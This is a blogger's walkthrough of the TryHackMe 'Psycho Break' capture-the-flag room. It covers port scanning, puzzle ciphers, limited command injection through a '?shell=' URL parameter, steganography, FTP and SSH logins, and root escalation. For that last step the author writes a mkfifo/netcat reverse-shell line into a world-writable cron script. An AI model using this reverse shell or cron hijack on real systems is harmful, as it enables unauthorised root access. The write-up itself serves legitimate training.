TryHackMe Walkthrough - Psycho Break

TryHackMe Walkthrough - Psycho Break


This is my walkthrough of the Psycho Break room on TryHackMe. This is a room based on the video game Evil Within. It’s marked as easy, but I have to admit I had a hard time with some parts. Mostly with the first encryption, and the very limited command injection.

  • Room: Psycho Break
  • Difficulty: Easy
  • URL:

Opened Port

I first start the room by scanning for open ports. As I recently did the RustScan room, I used it to run my scan.

rustscan -a target -- -A -script vuln | tee rust.txt

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
:           :
: :
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/ehogue/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p  ")

21/tcp open  ftp     syn-ack ProFTPD 1.3.5a
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_  /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 17:33
Completed NSE at 17:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 17:33
Completed NSE at 17:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 332.09 seconds

The scan gives us the answers to two questions from the room. There are 3 ports opened on the machine 21 (FTP), 22 (SSH), and 80 (HTTP). And the OS is Ubuntu.

FTP does not allow anonymous login, so I started looking at the web site.

Web Site

I loaded http://target/, the site is themed around the video game Evil Within. It consist of an image and some text about an incident at a mental hospital.

Room Web Site

I looked at the HTML and saw two things that did not appear on the page.

A comment that point to a different page.

<!-- Sebastian sees a path through the darkness which leads to a room => /sadistRoom -->

And a link that is suppose to point to a map, but gives us a 404.

<a href="map.html" style="color: #fff;">Here is the map</a>

The Sadist Room

I went to the Sadist Room. The Sadist Room

There is a link to get the key to the locker room. When you click on the link, you get the key, which is the answer to the next question on TryHackMe.

When you dismissed the popup with the key, the room changes, you need to click on a button and re-enter the key to get to the Locker Room.

The Locker Room.

The Locker Room

In the locker room, we have another link to the map. This time it’s a php file. There is an encoded text that we need to decode to access the map.

I tried a few things to crack that one: ROT13, I tried the Vigenère cipher with all the words found on the page, I tried the XOR brute force of CyberChef. Nothing worked.

I looked around the encryption category on CyberChef, and after trying many of them, I found the Atbash Cipher. It’s a simple substitution cipher where each letter of the alphabet is mapped to a reverse alphabet.

Using the cipher on CyberChef, I got the key to access the map. It’s also the answer to the next question in the room.

The Map

The map contains the two room I already accessed, and two other.

  • Safe Heaven
  • The Abandoned Room

Safe Heaven

Safe Heaven

This room contains a gallery with a few images. The source code also contain the following comment.

<!-- I think I'm having a terrible nightmare. Search through me and find it ... -->

I launched GoBuster on the /SafeHeaven/ folder and after some time it found one folder.

gobuster dir -e -u http://target/SafeHeaven/ -t30 -w ~/Kali/ScriptsAndTools/DirectoryList.txt

The Keeper’s Page

I went to The Keeper’s page.

The Keeper

I clicked on the Escape button. Which took me to a page that shows some stairs and gave me 1m 45s to find where the image was taken.

Save Yourself

I used Google reverse image search and found the location. I submitted the answer and got redirected the a page that gave me the Keeper Key. I used that key for the room question. And kept it for later.

You Got The Keeper Key !!!
Here is your key : THE_KEY

The Abandoned Room

The next room on the map is the Abandoned Room. I had to provide the Keeper Key to enter it.

The Abandoned Room

When I clicked on Go Further, I was taken to another page when I was give 1m 45s to escape Laura the Spiderlady.

The Spiderlady

Looking at the page source, it says there is a shell on that page.

<!-- There is something called "shell" on current page maybe that'll help you to get out of here !!!-->

I appended ?shell=ls to the end of the URL.


Files Listing

This list the files in the same folder as the current page. Sadly there is nothing interesting in there.

I started experimenting with other commands. And most of them gave me an error.

Command Not Permitted !!!

I tried many things, and failed all the time. I could not get anything other than ls working. After a while, I finally got ?shell=ls .. to work. It took me a while because I was always trying ls ../ with the extra / at the end and that was rejected.

Having the listing of the parent folder, I now see another folder.


Other Listing

The name of the text file is the answer to the next question in the room. The file contains this text:

You made it. Escaping from Laura is not easy, good job ....

There is also a zip file. I downloaded it and extracted it’s content.

$ unzip 
  inflating: helpme.txt              
  inflating: Table.jpg               

$ cat helpme.txt 

From Joseph,

Who ever sees this message "HELP Me". Ruvik locked me up in this cell. Get the key on the table and unlock this cell. I'll tell you what happened when I am out of 
this cell.

Joseph is the answer to the next question in the room.

There is a jpeg file in the zip. But running file on it shows that it’s not an image.

$ file Table.jpg 
Table.jpg: Zip archive data, at least v2.0 to extract

$ unzip Table.jpg
Archive:  Table.jpg
  inflating: Joseph_Oda.jpg          
  inflating: key.wav                 

$ file Joseph_Oda.jpg 
Joseph_Oda.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 350x490, components 3

$ file key.wav 
key.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 8000 Hz

I looked at the exif data on both file with exiftool, there was nothing interesting. I opened the wav file with Sonic Visualiser, but I did not see anything in there.

Then I listened to the audio file. It sounded like Morse code. So I looked for a decoder online and found one. The message in the Morse code is the answer to the next question in the room.

After the tool decoded the message, I used it to extract a file hidden in the image.

steghide extract -sf Joseph_Oda.jpg 
Enter passphrase: 
wrote extracted data to "thankyou.txt".

$ cat thankyou.txt 

From joseph,

Thank you so much for freeing me out of this cell. Ruvik is nor good, he told me that his going to kill sebastian and next would be me. You got to help 
Sebastian ... I think you might find Sebastian at the Victoriano Estate. This note I managed to grab from Ruvik might help you get inn to the Victoriano Estate. 
But for some reason there is my name listed on the note which I don't have a clue.

        //                                              \\
        ||      (NOTE) FTP Details                      ||
        ||      ==================                      ||
        ||                                              ||
        ||      USER : joseph                           ||
        ||      PASSWORD : PASSWORD                     ||
        ||                                              ||
        \\                                              //

Good luck, Be carefull !!!

The FTP username and password are the answers to the last two questions of that section.


I used the credentials to connect to the FTP server. And download the two files I found on it.

ftp target
Connected to target.
220 ProFTPD 1.3.5a Server (Debian) [::ffff:]
Name (target:): joseph
331 Password required for joseph
230 User joseph logged in
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxr-xr-x   1 joseph   joseph   11641688 Aug 13  2020 program
-rw-r--r--   1 joseph   joseph        974 Aug 13  2020 random.dic
226 Transfer complete

ftp> get random.dic
local: random.dic remote: random.dic
200 PORT command successful
150 Opening BINARY mode data connection for random.dic (974 bytes)
226 Transfer complete
974 bytes received in 0.00 secs (1.2937 MB/s)

ftp> binary
200 Type set to I

ftp> get program
local: program remote: program
200 PORT command successful
150 Opening BINARY mode data connection for program (11641688 bytes)
226 Transfer complete
11641688 bytes received in 27.23 secs (417.4516 kB/s)

ftp> quit

$ file random.dic 
random.dic: ASCII text, with CRLF line terminators

$ file program 
program: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/, for GNU/Linux 2.6.32, BuildID[sha1]=294d1f19a085a730da19a6c55788ec08c2187039, stripped

The file random.dic seems to contain a list of potential passwords.

I launched another VM to run the program.

$ ./program     
[+] Usage

./program <word>

$ ./program aaaa
aaaa => Incorrect

Looks like the program will give me what I need if I give it the correct password. I could have try to reverse it, but since we have a small list of potential password, it’s a lot easier to brute force it. I wrote a small python script that looped through all the keys found in dictionary file and try them with the program.

It found the correct key after less that a minutes. Then the program gave me a string of numbers to decode.

./program kidman             
kidman => Correct

Well Done !!!
Decode This => 55 444 3 6 2 66 7777 7 2 7777 7777 9 666 777 3 444 7777 7777 666 7777 8 777 2 66 4 33

I tried that strings on the Magic recipe in CyberChef, but it did not find anything.

After searching a lot about what kind of cipher this could I finally saw someone mentioning T9 keyboards for a similar code. Then it was evident that this was the correct cipher. I remember typing on those and hating it. This is how you type words on old cell phone with only digits. There would be 3 or 4 characters per digits. You would need to type the same digit multiple time to get the letter you wanted.

I found a picture of a T9 keypad and used it to decipher the message. Then used it as the answer to the question in the room.


From there, I could use ssh to connect to the server using the username kidman and the password from the previous question (all in uppercase).

ssh kidman@target
kidman@target's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)
Last login: Fri Aug 14 22:28:13 2020 from
kidman@evilwithin:~$ ls -la
total 52
drwxr-xr-x 4 kidman kidman 4096 Mar 25 03:50 .
drwxr-xr-x 5 root   root   4096 Jul 13  2020 ..
-rw-rw-r-- 1 kidman kidman  264 Aug 13  2020 .readThis.txt
-rw-r--r-- 1 root   root     25 Mar 25 03:50 .the_eye.txt
-rw-rw-r-- 1 kidman kidman   33 Jul 13  2020 user.txt

kidman@evilwithin:~$ cat user.txt 

We have the first flag.

There are also two hidden files in kidman’s home folder.

kidman@evilwithin:~$ cat .readThis.txt 

uC@> z:5>2?i

%96 E9:?8 x 2> 23@FE E@ E6== D@ :D E@A D64C6E] }@ @?6 5@6D?VE <?@H 23@FE E9:D] xEVD E96 #FG:<VD 6J6] }@ @?6 42? 9:56 2H2J 7C@> :E] qFE x 42? E6== J@F @?6 E9:?8 D62C49 7@C E96 DEC:?8 YE9606J60@70CFG:<Y ] *@F 8@E E@ 96=A $632DE:2? 56762E #FG:< ]]]

kidman@evilwithin:~$ cat .the_eye.txt 
No one shall hide from me

The .readThis.txt file seem to have some encrypted content. And the other one could be the key. I left them aside to explore a little.

I checked for sudo and crons.

kidman@evilwithin:~$ sudo -l
[sudo] password for kidman: 
Sorry, user kidman may not run sudo on evilwithin.

kidman@evilwithin:~$ crontab -l
no crontab for kidman

kidman@evilwithin:~$ cat /etc/crontab 


*/2 * * * * root python3 /var/

There is a cron that runs as root every two minutes. Lets look at it.

kidman@evilwithin:~$ ls -la /var/
-rwxr-xrw- 1 root root 300 Aug 14  2020 /var/

kidman@evilwithin:~$ cat /var/

import subprocess
import random

stuff = ["I am watching you.","No one can hide from me.","Ruvik ...","No one shall hide from me","No one can escape from me"]
sentence = "".join(random.sample(stuff,1))"echo %s > /home/kidman/.the_eye.txt"%(sentence),shell=True)

The file can be written by anyone. So I injected a reverse shell in the file.

import os

os.system("mkfifo /tmp/kirxhbg; nc 4444 0</tmp/kirxhbg | /bin/sh >/tmp/kirxhbg 2>&1; rm /tmp/kirxhbg")

I started a Netcat listener, and waited for the connection back.

$ nc -lvnp 4444
Listening on 4444
Connection received on 56178


cat /root/root.txt

Defeat Ruvik

There is one last task: to defeat Ruvik. I thought this might have to do with the encrypted file from before. Turned out it’s simply ROT47.

From Kidman:

The thing I am about to tell so is top secret. No one doesn't know about this. It's the Ruvik's eye. No one can hide away from it. But I can tell you one thing search for the string *the_eye_of_ruvik* . You got to help Sebastian defeat Ruvik ...

There is also a readMe.txt in /root/.

root@evilwithin:~# cat /root/readMe.txt 
|  From Sebastian :                                                                     |
|                                                                                       |
|  You have one final task ... Help me to defeat ruvik !!!                              |
|                                                                                       |

I looked for the string “the_eye_of_ruvik” on the server.

grep -R the_eye_of_ruvik / 2>/dev/null

This took a while, without finding anything. So I went and look at the hint on TryHackMe.

Delete user Ruvik account.

That’s easy enough. I canceled the grep that was still running and deleted the user account.

root@evilwithin:~# ls -la /home/ruvik/
total 24
drwxr-xr-x 2 ruvik ruvik 4096 Jul 13  2020 .
drwxr-xr-x 5 root  root  4096 Jul 13  2020 ..
-rw------- 1 ruvik ruvik    5 Jul 13  2020 .bash_history
-rw-r--r-- 1 ruvik ruvik  220 Jul 13  2020 .bash_logout
-rw-r--r-- 1 ruvik ruvik 3771 Jul 13  2020 .bashrc
-rw-r--r-- 1 ruvik ruvik  655 Jul 13  2020 .profile

root@evilwithin:~# deluser ruvik
Removing user `ruvik' ...
Warning: group `ruvik' has no more members.

This did not change anything other than the user being gone. But the task did require any answer. So I guess that was it.